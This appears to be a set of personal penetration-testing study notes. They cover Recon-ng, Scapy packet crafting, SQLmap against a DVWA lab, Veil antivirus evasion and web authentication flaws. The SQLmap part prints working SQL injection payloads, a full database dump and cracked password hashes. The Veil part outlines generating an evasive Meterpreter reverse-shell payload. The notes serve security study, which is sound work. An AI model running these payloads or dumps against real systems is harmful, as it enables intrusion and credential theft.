
Scroll the output in Example 3-13 to the right to see the D and K columns The letter D indicates that the module has dependencies. The letter K indicates that an API key is needed in order to use the resources used in a particular module. For example, the module with the path recon/companies-contacts/censys_email_address has dependencies and needs an API key in order to query the Censys database. (Censys is a very popular resource for querying OSINT data.)

Example 3-13 - The Recon-ng Marketplace Search

  [recon-ng][default] > marketplace search    +---------------------------------------------------------------------------------------------------+   |                        Path                        | Version |     Status    |  Updated   | D | K |   +---------------------------------------------------------------------------------------------------+   | discovery/info_disclosure/cache_snoop              | 1.1     | not installed | 2020-10-13 |   |   |   | discovery/info_disclosure/interesting_files        | 1.2     | not installed | 2021-10-04 |   |   |   | exploitation/injection/command_injector            | 1.0     | not installed | 2019-06-24 |   |   |   | exploitation/injection/xpath_bruter                | 1.2     | not installed | 2019-10-08 |   |   |   | import/csv_file                                    | 1.1     | not installed | 2019-08-09 |   |   |   | import/list                                        | 1.1     | not installed | 2019-06-24 |   |   |   | import/masscan                                     | 1.0     | not installed | 2020-04-07 |   |   |   | import/nmap                                        | 1.1     | not installed | 2020-10-06 |   |   |   | recon/companies-contacts/bing_linkedin_cache       | 1.0     | not installed | 2019-06-24 |   | * |   | recon/companies-contacts/censys_email_address      | 2.0     | not installed | 2021-05-11 | * | * |   | recon/companies-contacts/pen                       | 1.1     | not installed | 2019-10-15 |   |   |   | recon/companies-domains/censys_subdomains          | 2.0     | not installed | 2021-05-10 | * | * |   | recon/companies-domains/pen                        | 1.1     | not installed | 2019-10-15 |   |   |   | recon/companies-domains/viewdns_reverse_whois      | 1.1     | not installed | 2021-08-24 |   |   |   | recon/companies-domains/whoxy_dns                  | 1.1     | not installed | 2020-06-17 |   | * |   | recon/companies-hosts/censys_org                   | 2.0     | not installed | 2021-05-11 | * | * | <output omitted>   | reporting/csv                                      | 1.0     | not installed | 2019-06-24 |   |   |   | reporting/html                                     | 1.0     | not installed | 2019-06-24 |   |   |   | reporting/json                                     | 1.0     | not installed | 2019-06-24 |   |   |   | reporting/list                                     | 1.0     | not installed | 2019-06-24 |   |   |   | reporting/proxifier                                | 1.0     | not installed | 2019-06-24 |   |   |   | reporting/pushpin                                  | 1.0     | not installed | 2019-06-24 |   | * |   | reporting/xlsx                                     | 1.0     | not installed | 2019-06-24 |   |   |   | reporting/xml                                      | 1.1     | not installed | 2019-06-24 |   |   |   +---------------------------------------------------------------------------------------------------+    D = Has dependencies. See info for details.   K = Requires keys. See info for details.  [recon-ng][default] >

expand_less

Step 4. Refresh the marketplace.

You can refresh the data about the available modules by using the marketplace refresh command, as shown in Example 3-14.

Example 3-14 - Refreshing the Recon-ng Marketplace Data

 [recon-ng][default] > marketplace refresh [*] Marketplace index refreshed.  [recon-ng][default] >

expand_less

Step 5. Search the marketplace.

Let’s perform a quick search to find different subdomains of one of my domains (h4cker.org). We can use the module bing_domain_web to try to find any subdomains leveraging the Bing search engine. You can perform a keyword search for any modules by using the command marketplace search < keyword >, as demonstrated in Example 3-15.

Example 3-15 - Marketplace Keyword Search

 [recon-ng][default] > marketplace search bing [*] Searching module index for 'bing'...    +-----------------------------------------------------------------------------------------------+   |                      Path                      | Version |     Status    |  Updated   | D | K |   +-----------------------------------------------------------------------------------------------+   | recon/companies-contacts/bing_linkedin_cache   | 1.0     | not installed | 2019-06-24 |   | * |   | recon/domains-hosts/bing_domain_api            | 1.0     | not installed | 2019-06-24 |   | * |   | recon/domains-hosts/bing_domain_web            | 1.1     | installed     | 2019-07-04 |   |   |   | recon/hosts-hosts/bing_ip                      | 1.0     | not installed | 2019-06-24 |   | * |   | recon/profiles-contacts/bing_linkedin_contacts | 1.2     | not installed | 2021-08-24 |   | * |   +-----------------------------------------------------------------------------------------------+    D = Has dependencies. See info for details.   K = Requires keys. See info for details.  [recon-ng][default] >

expand_less

Step 6. Install a module.

Several results matched the bing keyword. However, the one that we are interested in is recon/domains-hosts/bing_domain_web. You can install the module by using the marketplace install command, as shown in Example 3-16.

Example 3-16 - Installing a Recon-ng Module

 [recon-ng][default] > marketplace install recon/domains-hosts/bing_domain_web [*] Module installed: recon/domains-hosts/bing_domain_web [*] Reloading modules... [recon-ng][default] >

expand_less

Step 7. Show installed modules.

You can use the modules search command (as shown in Example 3-17) to show all the modules that have been installed in Recon-ng.

Example 3-17 - Recon-ng Installed Modules

 [recon-ng][default] > modules search   Discovery   ---------     discovery/info_disclosure/interesting_files   Recon   -----     recon/domains-hosts/bing_domain_web     recon/domains-hosts/brute_hosts     recon/domains-hosts/certificate_transparency     recon/domains-hosts/netcraft [recon-ng][default] >

expand_less

Step 8. Load a module.

To load the module that you would like to use, use the modules load command. In Example 3-18, the bing_domain_web module is loaded. Notice that the prompt changed to include the name of the loaded module. After the module is loaded, you can display the module options by using the info command.

Example 3-18 - Loading an Installed Module in Recon-ng

 [recon-ng][default] > modules load recon/domains-hosts/bing_domain_web [recon-ng][default][bing_domain_web] > info       Name: Bing Hostname Enumerator     Author: Tim Tomes (@lanmaster53)    Version: 1.1  Description:   Harvests hosts from Bing.com by using the 'site' search operator. Updates the 'hosts'    table with the results.  Options:   Name    Current Value  Required  Description   ------  -------------  --------  -----------   SOURCE  h4cker.org  yes      source of input (see 'info' for details)  Source Options:   default     SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL   <string>    string representing a single input   <path>      path to a file containing a list of inputs   query <sql> database query returning one column of inputs  [recon-ng][default][bing_domain_web] >

expand_less

Step 9. Change the source.

You can change the source (the domain to be used to find its subdomains) by using the command options set SOURCE, as demonstrated in Example 3-19. After the source domain is set, you can type run to run the query. The highlighted lines show that four subdomains were found using the bing_domain_web module.

Example 3-19 - Setting the Source Domain and Running the Query

 [recon-ng][default][bing_domain_web] > options set SOURCE h4cker.org SOURCE => h4cker.org [recon-ng][default][bing_domain_web] > run ---------- H4CKER.ORG ---------- [*] URL: https://www.bing.com/search?first=0&q=domain%3Ah4cker.org [*] Country: None [*] Host: bootcamp.h4cker.org [*] Ip_Address: None [*] Latitude: None [*] Longitude: None [*] Notes: None [*] Region: None [*] -------------------------------------------------- [*] Country: None [*] Host: webapps.h4cker.org [*] Ip_Address: None [*] Latitude: None [*] Longitude: None [*] Notes: None [*] Region: None [*] -------------------------------------------------- [*] Country: None [*] Host: lpb.h4cker.org [*] Ip_Address: None [*] Latitude: None [*] Longitude: None [*] Notes: None [*] Region: None [*] -------------------------------------------------- [*] Country: None [*] Host: malicious.h4cker.org [*] Ip_Address: None [*] Latitude: None [*] Longitude: None [*] Notes: None [*] Region: None [*] -------------------------------------------------- [*] Sleeping to avoid lockout... [*] URL: https://www.bing.com/search?first=0&q=domain%3Ah4cker.org+-domain%3Abootcamp.h4cker. org+-domain%3Awebapps.h4cker.org+-domain%3Alpb.h4cker.org+-domain%3Amalicious.h4cker.org  ------- SUMMARY ------- [*] 4 total (0 new) hosts found. [recon-ng][default][bing_domain_web] >

[Vault: Tools] scapy

Thu, 09 Oct 2025 10:02:49 GMT

Part 1: Investigate the Scapy Tool

Scapy is a multi-purpose tool originally written by Philippe Biondi.

Step 1: Investigate Scapy documentation and resources.

Scapy can be run interactively from the Python shell or can be incorporated into Python programs by importing the python-scapy module. The Scapy tool has extensive documentation online at https://scapy.readthedocs.io/en/latest/introduction.html.

Step 2: Use Scapy interactive command mode.

Enter the scapy command in a terminal window to load the Python interpreter. By using this command, the interpreter runs pre-loaded with the Scapy classes and objects. You will enter Scapy commands interactively and receive the output. Scapy commands can also be embedded in a Python script.

The commands to craft and send packets require root privileges to run. Use the sudo su command to obtain root privileges before starting Scapy. If prompted for a password, enter kali.

┌──(kali㉿kali)-[~]

└─$ sudo su

[sudo] password for kali:

┌──(root㉿kali)-[/home/kali]

└─#

Load the Scapy tool using the scapy command. The interactive Python interpreter will load and present a screen image similar to that shown.

┌──(root㉿kali)-[/home/kali]

└─# scapy

INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().

  aSPY//YASa      

         apyyyyCY//////////YCa       |

        sY//////YSpcs  scpCY//Pp     | Welcome to Scapy

ayp ayyyyyyySCP//Pp syY//C | Version 2.5.0

AYAsAYYYYYYYY///Ps cY//S |

     pCCCCY//p  cSSps y//Y   | https://github.com/secdev/scapy

     SPPPP///a          pP///AC//Y   |

          A//A            cyP////C   | Have fun!

          p///Ac            sC///a   |

          P////YCpc           A//A   | What is dead may never die!

   scccccp///pSP///p          p//Y   |                     -- Python 2

  sY/////////y  caa           S//P   |

   cayCyayP//Ya              pY/Ya

    sY/PsY////YCc          aC//Yp

     sc  sccaCY//PCypaapyCP//YSs 

        spCPY//////YPSps   

                   ccaacs        

                                   using IPython 8.5.0

At the >>> prompt within the Scapy shell, enter the ls() function to list all of the available default formats and protocols included with the tool. The list is quite extensive and will fill multiple screens.

ls()

TFTP is a protocol used to send and receive files on a LAN segment. It is commonly used to back up configuration files on networking devices. Scroll up to view the available TFTP packet formats.

Step 3: Examine the fields in an IPv4 packet header.

It is important to understand the structure of an IP packet before creating and sending custom packets over the network. Each IP packet has an associated header that provides information about the structure of the packet. Review this information before continuing with the lab.

IPv4 Packet Header Fields

The binary values of each field identify various settings of the IP packet. Protocol header diagrams, which are read left to right, and top down, provide a visual to refer to when discussing protocol fields. The IP protocol header diagram in the figure identifies the fields of an IPv4 packet. ![[attachments/image.png]] Significant fields in the IPv4 header include the following:

Version - Contains a 4-bit binary value set to 0100 that identifies this as an IPv4 packet.

Differentiated Services or DiffServ (DS) - Formerly called the type of service (ToS) field, the DS field is an 8-bit field used to determine the priority of each packet. The six most significant bits of the DiffServ field are the differentiated services code point (DSCP) bits and the last two bits are the explicit congestion notification (ECN) bits.

Time to Live (TTL) – TTL contains an 8-bit binary value that is used to limit the lifetime of a packet. The packet source device sets the initial TTL value. It is decreased by one each time the packet is processed by a router. If the TTL field decrements to zero, the router discards the packet and sends an Internet Control Message Protocol (ICMP) Time Exceeded message to the source IP address. Because the router decrements the TTL of each packet, the router must also recalculate the Header Checksum.

Protocol – This field is used to identify the next level protocol. This 8-bit binary value indicates the data payload type that the packet is carrying, which enables the network layer to pass the data to the appropriate upper-layer protocol. Common values include ICMP (1), TCP (6), and UDP (17).

Header Checksum – This is used to detect corruption in the IPv4 header.

Source IPv4 Address – This contains a 32-bit binary value that represents the source IPv4 address of the packet. The source IPv4 address is always a unicast address.

Destination IPv4 Address – This contains a 32-bit binary value that represents the destination IPv4 address of the packet. The destination IPv4 address is a unicast, multicast, or broadcast address.

The ls() function can also be used to list details of the fields and options available in each protocol header. The syntax to use a function in Scapy is function_name(arguments). Use the ls(IP) function to list the available fields in an IP packet header.

>>> ls(IP)

version : BitField (4 bits) = ('4')

ihl : BitField (4 bits) = ('None')

tos : XByteField = ('0')

len : ShortField = ('None')

id : ShortField = ('1')

flags : FlagsField = ('<Flag 0 ()>')

frag : BitField (13 bits) = ('0')

ttl : ByteField = ('64')

proto : ByteEnumField = ('0')

chksum : XShortField = ('None')

src : SourceIPField = ('None')

dst : DestIPField = ('None')

options : PacketListField = ('[]')

Part 2: Use Scapy to Sniff Network Traffic

Scapy can be used to capture and display network traffic, similar to a tcpdump or tshark packet collection.

Step 1: Use the sniff() function.

Use the sniff() function to collect traffic using the default eth0 interface of your VM. Start the capture with the sniff() function without specifying any arguments.

sniff()

Open a second terminal window and ping an internet address, such as www.cisco.com. Remember to specify the count using the -c argument.

┌──(kali㉿kali)-[~]

└─$ ping -c 5 www.cisco.com

Return to the terminal window that is running the Scapy tool. Press CTRL-C to stop the capture. You should receive output similar to what is shown here:

^C<Sniffed: TCP:75 UDP:42 ICMP:32 Other:2>

View the captured traffic using the summary() function. The a=_ assigns the variable a to hold the output of the sniff() function. The underscore ( _ ) in Python is used to temporarily hold the output of the last function executed.

a=_

a.summary()

The output of this command can be extensive, depending on the applications running on the network.

Step 2: Capture and save traffic on a specific interface.

In this step, you will capture traffic to and from a device connected to a virtual network in your Kali Linux VM.

Open a new terminal window. Use the ifconfig command to determine the name of the interface that is assigned the IP address 10.6.6.1. This is the default gateway address for one of the virtual networks running inside Kali. Note the name of interface.
Return to the terminal window that is running the Scapy tool. Use the syntax sniff(iface="interface name") to begin the capture on the br-internal virtual interface.

sniff(iface="br-internal")

Open Firefox and navigate to the URL http://10.6.6.23/. When the Gravemind home page opens, return to the terminal window that is running the Scapy tool. Press CTRL-C. You should receive output similar to:

^C<Sniffed: TCP:112 UDP:0 ICMP:0 Other:2>

View the captured traffic as you did in Step 1d.

a=_

a.summary()

Step 3: Examine the collected packets.

In this step, you will filter the collected traffic to include only ICMP traffic, limit the number of packets being collected, and view the individual packet details.

Use interface ID associated with 10.6.6.1 (br-internal) to capture ten ICMP packets sent and received on the internal virtual network. The syntax is sniff(iface="interface name", filter = “protocol", count = integer).

sniff(iface="br-internal",filter = “icmp",count = 10)

Open a second terminal window and ping the host at 10.6.6.23.

┌──(kali㉿Kali)-[~]

└─$ ping –c 10 10.6.6.23

Return to the terminal window running the Scapy tool. The capture automatically stopped when 10 packets were sent or received. View the captured traffic with line numbers using the nsummary() function.

a=_

a.nsummary()

The summary should only contain 10 lines because the capture count is equal to 10.

To view details about a specific packet in the series, refer to the blue line number of the packet. Do not include the leading zeros.

a[2]

The detail output shows the layers of information about the protocol data units (PDUs) that make up the packet. The protocol layer names appear in red in the output. 5. Use the wrpcap() function to save the captured data to a pcap file that can be opened by Wireshark and other applications. The syntax is wrpcap(“filename.pcap", variable name), in this example the variable that you stored the output is “a".

wrpcap(“capture1.pcap", a)

The .pcap file will be written to the default user directory. Use a different terminal window to verify the location of the capture1.pcap file using the Linux ls command.
Open the capture in Wireshark to view the file contents.

Part 3: Create and Send an ICMP Packet.

ICMP is a protocol designed to send control messages between network devices for various purposes. There are many types of ICMP packets, with echo-request and echo-reply the most familiar to IT technicians. To see a list of the message types that can be sent and received using ICMP, navigate to https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml.

Step 1: Use interactive mode to create and send a custom ICMP packet.

In a Scapy terminal window, enter the command to sniff traffic from the interface connected to the 10.6.6.0/24 network.

sniff(iface="br-internal")

Open another terminal window, enter sudo su to perform packet crafting as root. Start a second instance of Scapy. Enter the send() function to send a packet to 10.6.6.23 with a modified ICMP payload.

┌──(kali㉿kali)-[~]

└─$ sudo su

[sudo] password for kali:

┌──(root㉿kali)-[/home/kali]

└─# scapy

send(IP(dst="10.6.6.23")/ICMP()/"This is a test")

Response

Sent 1 packet

Return to the first terminal window and press CTRL-C. You should receive a response similar to this:

^C<Sniffed: TCP:0 UDP:0 ICMP:2 Other:0>

Enter the summary command to display the summary with packet numbers.

a=_

a.nsummary()

Step 2: View and compare the ICMP packet contents.

Use the packet numbers to view the individual ICMP Echo-request and Echo-reply packets. Compare those packets to the ones that you examined in Part 2, Step 3d.

a[packet number]

Part 4: Create and Send a TCP SYN Packet.

In this part, you will use Scapy to determine if port 445, a Microsoft Windows drive share port, is open on the target system at 10.6.6.23.

Step 1: Start the packet capture on the internal interface.

In the original Scapy terminal window, begin a packet capture on the internal interface attached to the 10.6.6.0/24 network. Use the interface name that you obtained previously.
Navigate to the second terminal window. Create and send a TCP SYN packet using the command shown.

send(IP(dst="10.6.6.23")/TCP(dport=445, flags="S"))

1 packet sent

This command sent an IP packet to the host with IP address 10.6.6.23. The packet is addressed to TCP port 445 and has the S (SYN) flag set.

Close the terminal window.

Step 2: Review the captured packets.

In the original Scapy terminal window, stop the packet capture by pressing CTRL-C. The output should be similar to that shown.

^C<Sniffed: TCP:3 UDP:0 ICMP:0 Other:0>

View the captured TCP packets using the nsummary() function. Display the detail of the TCP packet that was returned from the target computer at 10.6.6.23.

a[packet number]

[Vault: Tools] SQLmap

Thu, 09 Oct 2025 10:02:49 GMT

SQLmap is often considered a web vulnerability and SQL injection tool. It helps automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection.

https://sqlmap.org
You can obtain access to SQLmap’s source code and additional documentation at the following GitHub repository: https://github.com/sqlmapproject/sqlmap.

Let’s take a look at a quick example of how to use SQLmap to exploit an SQL injection vulnerability. Say that a host with IP address 10.1.1.14 is vulnerable to SQL injection. In order to automate the enumeration and exploitation of this vulnerability, you first connect to the vulnerable application and capture the HTTP GET request by using a proxy. ( Module 6 describes how proxies work.) Example 10-15 shows the captured HTTP GET request to the vulnerable server (10.1.1.14).

Example 10-15 - HTTP GET Request to a Vulnerable Web Application

GET /dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit HTTP/1.1Host: 10.1.1.14User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://10.1.1.14/dvwa/vulnerabilities/sqli/Cookie: security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4Connection: closeUpgrade-Insecure-Requests: 1

The first highlighted line in Example 10-15 shows the GET request’s URI. The second highlighted line shows the cookie and the session ID (PHPSESSID=1558e11b491da91be3b68e5cce953ca4). You can use this information to launch the SQLmap tool, as shown in Example 10-16.

Example 10-16 - Using the SQLmap Tool to Exploit an SQL Injection Vulnerability

root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" --dbs         ___        __H__ ___ ___[.]_____ ___ ___ {1.2.4#stable}|_ -| . [)] | .'| . ||___|_ [.]_|_|_|__,| _|          |_|V         |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets withoutprior mutual consent is illegal. It is the end user's responsibilityto obey all applicable local, state and federal laws. Developersassume no liability and are not responsible for any misuse or damagecaused by this program[*] starting at 21:49:11[21:49:11] [INFO] testing connection to the target URL[21:49:11] [INFO] testing if the target URL content is stable[21:49:12] [INFO] target URL content is stable[21:49:12] [INFO] testing if GET parameter 'id' is dynamic...<output omitted for brevity>...[21:50:12] [INFO] target URL appears to have 2 columns in query[21:50:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1to 20 columns' injectable[21:50:12] [WARNING] in OR boolean-based injection cases, pleaseconsider usage of switch '--drop-set-cookie' if you experience anyproblems during data retrievalGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 201HTTP(s) requests:---Parameter: id (GET)     Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQLcomment) (NOT)    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit    Type: error-based    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause(FLOOR)    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 2 columns     Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a, 0x716a717671), NULL#&Submit=Submit---[21:50:22] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 8.04 (Hardy Heron)web application technology: PHP 5.2.4, Apache 2.2.8back-end DBMS: MySQL >= 4.1[21:50:22] [INFO] fetching database namesavailable databases [7]:[*] dvwa[*] information_schema[*] metasploit[*] mysql[*] owasp10[*] tikiwiki[*] tikiwiki195[21:50:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'[*] shutting down at 21:50:22

The first four highlighted lines in Example 10-16 show how SQLmap automates the various tests and payloads sent to the vulnerable application. (You might recognize some of these SQL statements and queries from Module 6.) The last few highlighted lines show how SQLmap was able to enumerate all the databases in the SQL server.

When you have a list of all available databases, you can try to retrieve the tables and records of the dvwa database by using the command shown in Example 10-17.

Example 10-17 - Retrieving Sensitive Information from a Database

root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" -D dvwa --dump-all ___...<output omitted for brevity>...[22:14:51] [INFO] resuming back-end DBMS 'mysql'[22:14:51] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)     Type: boolean-based blind   Title: OR boolean-based blind - WHERE or HAVING clause (MySQLcomment) (NOT)   Payload: id=omar' OR NOT 3391=3391#&Submit=Submit     Type: error-based    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause(FLOOR)    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit     Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 2 columns Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a,0x716a717671),NULL#&Submit=Submit---[22:14:52] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 8.04 (Hardy Heron)web application technology: PHP 5.2.4, Apache 2.2.8back-end DBMS: MySQL >= 4.1[22:14:52] [INFO] fetching tables for database: 'dvwa'[22:14:52] [WARNING] reflective value(s) found and filtering out[22:14:52] [INFO] fetching columns for table 'users' in database'dvwa'[22:14:52] [INFO] fetching entries for table 'users' in database'dvwa'[22:14:52] [INFO] recognized possible password hashes in column'password'...<output omitted for brevity>...[22:15:06] [INFO] starting dictionary-based cracking (md5_generic_passwd)[22:15:06] [INFO] starting 2 processes[22:15:08] [INFO] cracked password 'charley' for hash'8d3533d75ae2c3966d7e0d4fcc69216b'[22:15:08] [INFO] cracked password 'abc123' for hash'e99a18c428cb38d5f260853678922e03'[22:15:11] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'[22:15:13] [INFO] cracked password 'letmein' for hash'0d107d09f5bbe40cade3de5c71e9e9b7'Database: dvwaTable: users[5 entries]+---------+--------+------------------------------------------------------+---------------------------------------------+-----------+-------------+| user_id| user | avatar | password | last_name | first_name |+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+----------------+| 1 | admin | http://172.16.123.129/dvwa/hackable/users/admin.jpg |5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin || 2 | gordonb| http://172.16.123.129/dvwa/hackable/users/gordonb.jpg|e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon || 3 | 1337 | http://172.16.123.129/dvwa/hackable/users/1337.jpg |8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack  || 4 | pablo | http://172.16.123.129/dvwa/hackable/users/pablo.jpg |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo || 5 | smithy | http://172.16.123.129/dvwa/hackable/users/smithy.jpg|5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+---------------+[22:15:17] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/users.csv'[22:15:17] [INFO] fetching columns for table 'guestbook' in database'dvwa'[22:15:17] [INFO] fetching entries for table 'guestbook' in database'dvwa'Database: dvwaTable: guestbook[1 entry]+------------+------+-------------------------+| comment_id| name  | comment |+------------+------+-------------------------+| 1            | test | This is a test comment.|+------------+------+-------------------------+[22:15:17] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/guestbook.csv'[22:15:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'[*] shutting down at 22:15:17

The first four highlighted lines in Example 10-17 show how SQLmap was able to automatically enumerate users from the compromised database and crack their passwords.

[Vault: Tools] Veil

Thu, 09 Oct 2025 10:02:49 GMT

Veil is a framework that can be used with Metasploit to evade antivirus checks and other security controls. You can download Veil from https://github.com/Veil-Framework/Veil and obtain detailed documentation from https://github.com/Veil-Framework/Veil/wiki.

Usage

Step 1. Launch Veil

After using the veil command to launch Veil, the Veil menu is displayed ![[attachments/b12baa058a835fcc05da4fa3468f176f7ed2ee17.png]]

Step 2. Select Evasion

To use Veil for evasion, select the first option (number 1). Veil then shows the available payloads and Veil commands. ![[attachments/b32e73c419d9ae5ea743ab96185107203b4481d2.png]]

Step 3. List the Payloads

To list the available payloads, use the list command, and you see the screen in Figure. ![[attachments/f47da85c79e930eed5192999063e7649b8af94b1.png]]

Step 4. Install a Payload

In Figure, the Meterpreter reverse TCP payload is used. After you select the payload, you have to set the local host (LHOST) and then use the generate command to generate the payload. Figure shows the default Python installer being used to generate the payload. **Figure ** - Configuring the LHOST and Generating the Payload_ ![[attachments/fc735a95e9c0aa1391b88e4c1b86f78966258760.png]]

Step 5. Verify Payload File Location

Once the payload is generated, the screen shown in Figure is displayed. The top portion of Figure lists the locations of the payload executable, the source code, and the Metasploit resource file. ![[attachments/516a9b8211cb2b922cc14fc64faff449b608305f.png]]

[Vault: Vulns & Attacks] Authentication Based Vulnerabilities

Thu, 09 Oct 2025 10:02:49 GMT

Broken Access Control (BAC)

Session Hijacking

Applications can create [[Web Sessions|sessions]] to keep track of users before and after authentication. Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as username and password, one-time password, client-based digital certificate, and so on. One of the most widely used session ID exchange mechanisms is cookies. Cookies offer advanced capabilities that are not available in other methods. There are several ways an attacker can perform session hijacking and several ways a session token may be compromised:

Predicting session tokens: This is why it is important to use non-predictable tokens, as previously discussed in this section.
Session sniffing: This can occur through collecting packets of unencrypted web sessions.
On-path attack (formerly known as man-in-the-middle attack): With this type of attack, the attacker sits in the path between the client and the web server. In addition, a browser (or an extension or a plugin) can be compromised and used to intercept and manipulate web sessions between the user and the web server. This browser-based attack was previously known as a man-in-the-browser attack. If web applications do not validate and filter out invalid session ID values, they can potentially be used to exploit other web vulnerabilities, such as SQL injection (if the session IDs are stored on a relational database) or persistent XSS (if the session IDs are stored and reflected back afterward by the web application).

Redirect Attacks

Unvalidated redirects and forwards are vulnerabilities that an attacker can use to attack a web application and its clients. The attacker can exploit such vulnerabilities when a web server accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. The attacker can modify the untrusted URL input and redirect the user to a malicious site to either install malware or steal sensitive information.

It is also possible to use unvalidated redirect and forward vulnerabilities to craft a URL that can bypass application access control checks. This, in turn, allows an attacker to access privileged functions that he or she would normally not be permitted to access.

NOTE Unvalidated redirect and forward attacks often require a little bit of social engineering.

Default Credentials

Attackers can easily identify and access systems that use shared default passwords. It is extremely important to always change default manufacturer passwords and restrict network access to critical systems. A lot of manufacturers now require users to change the default passwords during initial setup, but some don’t.

Attackers can easily obtain default passwords and identify Internet-connected target systems. Passwords can be found in product documentation and compiled lists available on the Internet. An example is http://www.defaultpassword.com, but there are dozens of other sites that contain default passwords and configurations on the Internet. It is easy to identify devices that have default passwords and that are exposed to the Internet by using search engines such as Shodan (https://www.shodan.io).

Kerberos Vulnerabilities

One of the most common attacks against Windows systems is the Kerberos golden ticket attack. An attacker can use such an attack to manipulate Kerberos tickets based on available hashes. The attacker only needs to compromise a vulnerable system and obtain the local user credentials and password hashes. If the system is connected to a domain, the attacker can identify a Kerberos ticket-granting ticket (KRBTGT) password hash to get the golden ticket.

Another weakness in Kerberos implementations is the use of unconstrained Kerberos delegation, a feature that allows an application to reuse the end-user credentials to access resources hosted on a different server. Typically, you should only allow Kerberos delegation on an application server that is ultimately trusted. However, this could have negative security consequences if abused, so Active Directory has Kerberos delegation turned off by default.

[[Password Attacks|Password Cracking]]

[Vault: Vulns & Attacks] Autherization Based Vulnerabilities

Thu, 09 Oct 2025 10:02:49 GMT

Authorization concerns the actions that users are permitted to do. While users might successfully authenticate to a system with their username and password, they may not be allowed to access certain resources, change or delete data, or change system settings. Only users with appropriate authorization are allowed to do these things.

Parameter Pollution

HTTP parameter pollution (HPP) vulnerabilities can be introduced if multiple HTTP parameters have the same name. This issue may cause an application to interpret values incorrectly. An attacker may take advantage of HPP vulnerabilities to bypass input validation, trigger application errors, or modify internal variable values. >NOTE HPP vulnerabilities can lead to server- and client-side attacks. An attacker can find HPP vulnerabilities by finding forms or actions that allow user-supplied input. Then the attacker can append the same parameter to the GET or POST data – but with a different value assigned.

Consider the following URL:
https://store.h4cker.org/?search=cars
This URL has the query string **search** and the parameter value **cars**. The parameter might be hidden among several other parameters. An attacker could leave the current parameter in place and append a duplicate, as shown here:
https://store.h4cker.org/?search=cars&results=20
The attacker could then append the same parameter with a different value and submit the new request:
https://store.h4cker.org/?search=cars&results=20&search=bikes
After submitting the request, the attacker could analyze the response page to identify whether any of the values entered were parsed by the application. Sometimes it is necessary to send three HTTP requests for each HTTP parameter. If the response from the third parameter is different from the first one – and the response from the third parameter is also different from the second one – this may be an indicator of an impedance mismatch that could be abused to trigger HPP vulnerabilities.

![[IDOR - Insecure direct object reference|Insecure Direct Object Reference]]

[Vault: Vulns & Attacks] Business Logic Flaws

Thu, 09 Oct 2025 10:02:49 GMT

